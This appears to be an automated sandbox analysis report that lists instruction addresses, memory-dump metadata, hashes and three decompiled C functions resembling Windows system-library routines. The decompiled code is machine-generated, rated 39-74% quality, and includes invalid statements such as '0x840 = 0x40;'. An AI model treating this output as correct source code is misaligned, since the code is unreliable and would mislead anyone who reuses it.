0x04bd6fda
0x04bd6fdd
0x04bd6fe2
0x04bd6fe7
0x04bd6feb
0x04bd6fef
0x04bd6ff3
0x04b9520c
0x04b9520c
0x04b9520f
0x04b95215
0x04b95234
0x04b9523a
0x04b9523a
0x04b95244
0x04b95245
0x04b95246
0x04b95251
0x04b95251
0x04bd6f13
0x04bd6f17
0x04bd6f17
0x04bd6f18
0x04bd6f1b
0x04bd6f1f
0x04bd6f23
0x00000000
0x04bd6f28
0x04b95204
0x04b95204
0x04b95208
0x00000000
0x04b95208
0x04b95185
0x04b95188
0x04b9518a
0x04b9518e
0x04b95195
0x04bd6db1
0x04bd6db5
0x04bd6db9
0x04b9519b
0x04b9519b
0x04b9519e
0x04b951a7
0x04b951a9
0x04b951a9
0x04b951b5
0x04b951b8
0x04b951bb
0x04b951be
0x04b951c1
0x04b951c5
0x04b951c9
0x04b951cd
0x04b951cd
0x04b951d8
0x04b951dc
0x04b951e0
0x04bd6dcc
0x04bd6dd0
0x04bd6dd5
0x04bd6ddd
0x04bd6de1
0x04bd6de1
0x04bd6de5
0x04bd6deb
0x04bd6df1
0x04bd6df7
0x04bd6dfd
0x04bd6e01
0x04bd6e05
0x04bd6e09
0x04bd6e0d
0x04bd6e11
0x04bd6e11
0x04b951eb
0x04bd6e1a
0x04bd6e1f
0x04bd6e21
0x04bd6e23
0x00000000
0x04b951f1
0x04b951f1
0x00000000
0x04b951f1

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72da5184e5505551bfcf310417daf13ffb84912f5a53bfc86d5d2783100d9c5
Instruction ID: fbb75355566b51ac2385a8f85662d373319ac44da4433879eee572fc2bc341d7
Opcode Fuzzy Hash: f72da5184e5505551bfcf310417daf13ffb84912f5a53bfc86d5d2783100d9c5
Instruction Fuzzy Hash: 9FC112755083809FD759CF28C480A6AFBE1FF88308F1449AEF8998B352E771E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04B903E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04B903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4c5d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04B90548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04BAB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04B7B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4c57c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04B87D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04B87D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04BE7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04BA9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04BE69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4c57c04 != 0) {
						_t118 = _v12;
						_t120 = E04BEA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4c57bd8;
						if( *0x4c57bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04BA95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04BA99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04BE3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04B6B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04BAAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4c58474 - 3;
										if( *0x4c58474 != 3) {
											 *0x4c579dc =  *0x4c579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04B87D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04B87D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04BE7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4c58708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4c57b00; // 0x0
							asm("ror esi, cl");
							 *0x4c5b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04BA95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04B77F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x04b903f1
0x04b903f7
0x04b903f9
0x04b903fb
0x04b903fd
0x04b90400
0x04b9040a
0x04bd4c7a
0x04b90537
0x04b90547
0x04b90410
0x04b90410
0x04b90414
0x04b90417
0x04b9041a
0x04b90421
0x04b90424
0x04b9042b
0x04b9043b
0x04b9043e
0x04b9043f
0x04b9043f
0x04b90446
0x04b90449
0x04b9044c
0x04b9044f
0x04b90459
0x04bd4c8d
0x04b9045f
0x04b9045f
0x04b9045f
0x04b90467
0x04bd4c97
0x04bd4c9d
0x04bd4ca4
0x04bd4caa
0x04bd4caf
0x04bd4cb1
0x04bd4cc3
0x04bd4cb3
0x04bd4cbc
0x04bd4cbc
0x04bd4cc8
0x04bd4ccb
0x04bd4cd7
0x04bd4cda
0x04bd4cdf
0x04bd4cdf
0x04bd4ccb
0x04bd4ca4
0x04b9046d
0x04b9046f
0x04b9046f
0x04b90471
0x04b90476
0x04b9047a
0x04b9047b
0x04b90483
0x04b90489
0x04b9048d
0x00000000
0x00000000
0x04bd4ce9
0x04bd4cef
0x04bd4d22
0x04bd4d22
0x00000000
0x04bd4d22
0x04bd4cf1
0x04bd4cf7
0x00000000
0x00000000
0x04bd4cf9
0x04bd4cff
0x00000000
0x00000000
0x04bd4d05
0x04bd4d07
0x00000000
0x00000000
0x04bd4d0d
0x04bd4d0f
0x04bd4d14
0x04bd4d16
0x00000000
0x00000000
0x04bd4d1c
0x04bd4d1c
0x04b90499
0x04b90535
0x04b90535
0x00000000
0x04b90535
0x04b904a6
0x04bd4d2c
0x04bd4d37
0x04bd4d39
0x04bd4d3b
0x00000000
0x00000000
0x04bd4d41
0x04bd4d48
0x04b90527
0x04b9052b
0x04b9052d
0x04b90530
0x04b90530
0x00000000
0x04b9052b
0x04bd4d4e
0x04b904ac
0x04b904ac
0x04b904af
0x04b904b2
0x04b904b7
0x04b904b9
0x04b904bb
0x04b904bd
0x04b904bf
0x04b904c5
0x04b904c9
0x04bd4d53
0x04bd4d59
0x04bd4db9
0x04bd4dba
0x04bd4dbf
0x04bd4dc2
0x04bd4dc4
0x04bd4dc7
0x04bd4dce
0x00000000
0x04bd4dce
0x04bd4d5b
0x04bd4d61
0x00000000
0x00000000
0x04bd4d63
0x04bd4d69
0x00000000
0x00000000
0x04bd4d6b
0x04bd4d6e
0x04bd4d74
0x04bd4d76
0x04bd4d7c
0x04bd4d7e
0x04bd4d84
0x04bd4d89
0x04bd4d8c
0x04bd4d8d
0x04bd4d92
0x04bd4d95
0x04bd4d96
0x04bd4d98
0x04bd4d9a
0x04bd4d9f
0x04bd4da4
0x04bd4da6
0x04bd4da8
0x04bd4daf
0x04bd4db1
0x04bd4db1
0x04bd4daf
0x04bd4da6
0x04bd4d84
0x04bd4d7c
0x00000000
0x04bd4d74
0x04b904d6
0x04bd4de1
0x04b904dc
0x04b904dc
0x04b904dc
0x04b904e4
0x04bd4deb
0x04bd4df1
0x04bd4df8
0x04bd4dfe
0x04bd4e03
0x04bd4e05
0x04bd4e17
0x04bd4e07
0x04bd4e10
0x04bd4e10
0x04bd4e1c
0x04bd4e1f
0x04bd4e35
0x04bd4e35
0x04bd4e1f
0x04bd4df8
0x04b904f1
0x04b904fa
0x04bd4e3f
0x04bd4e47
0x04bd4e5b
0x04bd4e61
0x04bd4e67
0x04bd4e69
0x04bd4e71
0x04bd4e73
0x04b90500
0x04b90500
0x04b90500
0x04b904fa
0x04b90508
0x04b9051d
0x04b9051d
0x04b9051f
0x04b90524
0x00000000
0x04b90524
0x04b90515
0x04b90517
0x04bd4e7a
0x04bd4e7c
0x00000000
0x00000000
0x04bd4e85
0x00000000
0x04bd4e85
0x00000000
0x04b90517

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dcfa54987f9921798d52859c296d4d791a79381092c989b227b8fa9804d1c7
Instruction ID: 4a3d79ccb56f06599d9b5590c87d9201f4d6f1a27470f82b9262536d1ab63bc7
Opcode Fuzzy Hash: 34dcfa54987f9921798d52859c296d4d791a79381092c989b227b8fa9804d1c7
Instruction Fuzzy Hash: 5391D671E00214AFEF21AE68C844BAE7BF4EB05724F1502E5E921AB2D1EB74BD40D791

Uniqueness

Uniqueness Score: -1.00%

Function 04B6C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04B6C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4c5d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04B76D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04BAB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4c57b9c; // 0x0
					_t74 = L04B84620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04BA9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04B877F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04BAF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04BA13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04B877F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04BA9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x04b6c608
0x04b6c615
0x04b6c625
0x04b6c62d
0x04b6c635
0x04b6c640
0x04b6c680
0x04b6c687
0x04b6c688
0x04b6c689
0x04b6c694
0x04b6c694
0x04b6c642
0x04b6c64a
0x04b6c697
0x04bd7a25
0x04bd7a2b
0x04bd7a2e
0x04bd7a30
0x04bd7bea
0x04bd7bea
0x00000000
0x04bd7bea
0x04bd7a36
0x04bd7a43
0x04bd7a48
0x04bd7a4c
0x04bd7a4e
0x00000000
0x00000000
0x04bd7a58
0x04bd7a5a
0x04bd7a5b
0x04bd7a5c
0x04bd7a5d
0x04bd7a63
0x04bd7a64
0x04bd7a6a
0x04bd7a6c
0x04bd7a6e
0x04bd79cb
0x04bd79cb
0x04bd79ce
0x04bd79d0
0x04bd7a98
0x04bd7a9b
0x04bd7a9b
0x04bd7a9e
0x04bd7aa1
0x04bd7bbe
0x04bd7bbe
0x04bd7bc0
0x04bd7be0
0x04bd7be0
0x04bd7a01
0x04bd7a01
0x04bd7a05
0x04bd7a07
0x04bd7a15
0x04bd7a15
0x04bd7a1a
0x00000000
0x04bd7a1a
0x04bd7bc2
0x04bd7bc6
0x04bd7bc9
0x04bd7bcd
0x04bd7bcf
0x04bd79e6
0x04bd79e6
0x04bd79eb
0x04bd79eb
0x04bd79ef
0x04bd79f1
0x00000000
0x00000000
0x04bd79f3
0x04bd79f5
0x04bd79ff
0x04bd79ff
0x00000000
0x04bd79ff
0x04bd79f7
0x04bd79fd
0x00000000
0x00000000
0x00000000
0x04bd79fd
0x04bd7bd5
0x04bd7bd8
0x00000000
0x00000000
0x04bd7ba9
0x04bd7bac
0x04bd7bb0
0x04bd7bb1
0x04bd7bb1
0x04bd7bb6
0x00000000
0x04bd7bb6
0x04bd7aa7
0x04bd7aaa
0x00000000
0x00000000
0x04bd7ab2
0x04bd7ab3
0x04bd7ab5
0x04bd7aec
0x04bd7aef
0x04bd7b25
0x04bd7b28
0x04bd7b62
0x04bd7b64
0x04bd7b8f
0x04bd7b92
0x04bd7b96
0x04bd7b98
0x00000000
0x00000000
0x04bd7b9e
0x04bd7b9f
0x04bd7ba3
0x00000000
0x04bd7ba3
0x04bd7b66
0x04bd7b68
0x04bd7ae2
0x04bd7ae2
0x00000000
0x04bd7ae2
0x04bd7b6e
0x04bd7b72
0x04bd7b75
0x04bd7b81
0x04bd7b85
0x04bd7b87
0x00000000
0x00000000
0x04bd7b31
0x04bd7b34
0x04bd7b3c
0x04bd7b45
0x04bd7b46
0x04bd7b4f
0x04bd7b51
0x04bd7b57
0x04bd7b59
0x04bd7b59
0x00000000
0x04bd7b59
0x04bd7b77
0x00000000
0x04bd7b77
0x04bd7b2a
0x00000000
0x04bd7b2a
0x04bd7af1
0x04bd7af3
0x00000000
0x00000000
0x04bd7afb
0x04bd7afc
0x04bd7afe
0x00000000
0x00000000
0x04bd7b00
0x04bd7b03
0x00000000
0x00000000
0x04bd7b05
0x04bd7b09
0x04bd7b0d
0x04bd7b0f
0x00000000
0x00000000
0x04bd7b18
0x04bd7b1d
0x00000000
0x04bd7b1d
0x04bd7ab7
0x04bd7ab9
0x00000000
0x00000000
0x04bd7abf
0x04bd7ac1
0x00000000
0x00000000
0x04bd7ac3
0x04bd7ac6
0x00000000
0x00000000
0x04bd7ac8
0x04bd7acc
0x04bd7ad0
0x04bd7ad2
0x00000000
0x00000000
0x04bd7adb
0x00000000
0x04bd7adb
0x04bd79d6
0x04bd79d9
0x04bd79dc
0x04bd7a91
0x04bd7a94
0x00000000
0x04bd7a94
0x04bd79e2
0x00000000
0x04bd79e2
0x04bd7a74
0x04bd7a7a
0x00000000
0x00000000
0x04bd7a8a
0x04bd7a21
0x04bd7a21
0x00000000
0x04bd7a21
0x04b6c650
0x04b6c651
0x04b6c656
0x04b6c65c
0x04b6c65d
0x04b6c663
0x04b6c664
0x04b6c66a
0x04b6c66e
0x04bd79c5
0x04bd79c7
0x00000000
0x04bd79c7
0x04b6c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17909822ab67ffc11ee44a56f1552cb89473da0fe2692d2cf741c6ae27ec5bfc
Instruction ID: fbd563d4be2812b030e31acda114e8487ede2090378d6dd6f77e771e9319a8a2
Opcode Fuzzy Hash: 17909822ab67ffc11ee44a56f1552cb89473da0fe2692d2cf741c6ae27ec5bfc
Instruction Fuzzy Hash: 5B81AF7A6056019FDB25CE14C890ABAB7E8EF84354F1448EEED459B244FB34FD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04BFB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E04BFB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4c57b9c; // 0x0
				_t124 = L04B84620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04BA9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04BA95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04BA95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04B877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04BA9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04BA95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4c57b9c; // 0x0
									_t92 = L04B84620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04BA9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04B6A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04BFE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04BFE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04BA95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x04bfb8d9
0x04bfb8e4
0x00000000
0x04bfb8e6
0x04bfb8f3
0x04bfb8f5
0x04bfb8f5
0x04bfb8f8
0x04bfb920
0x04bfb924
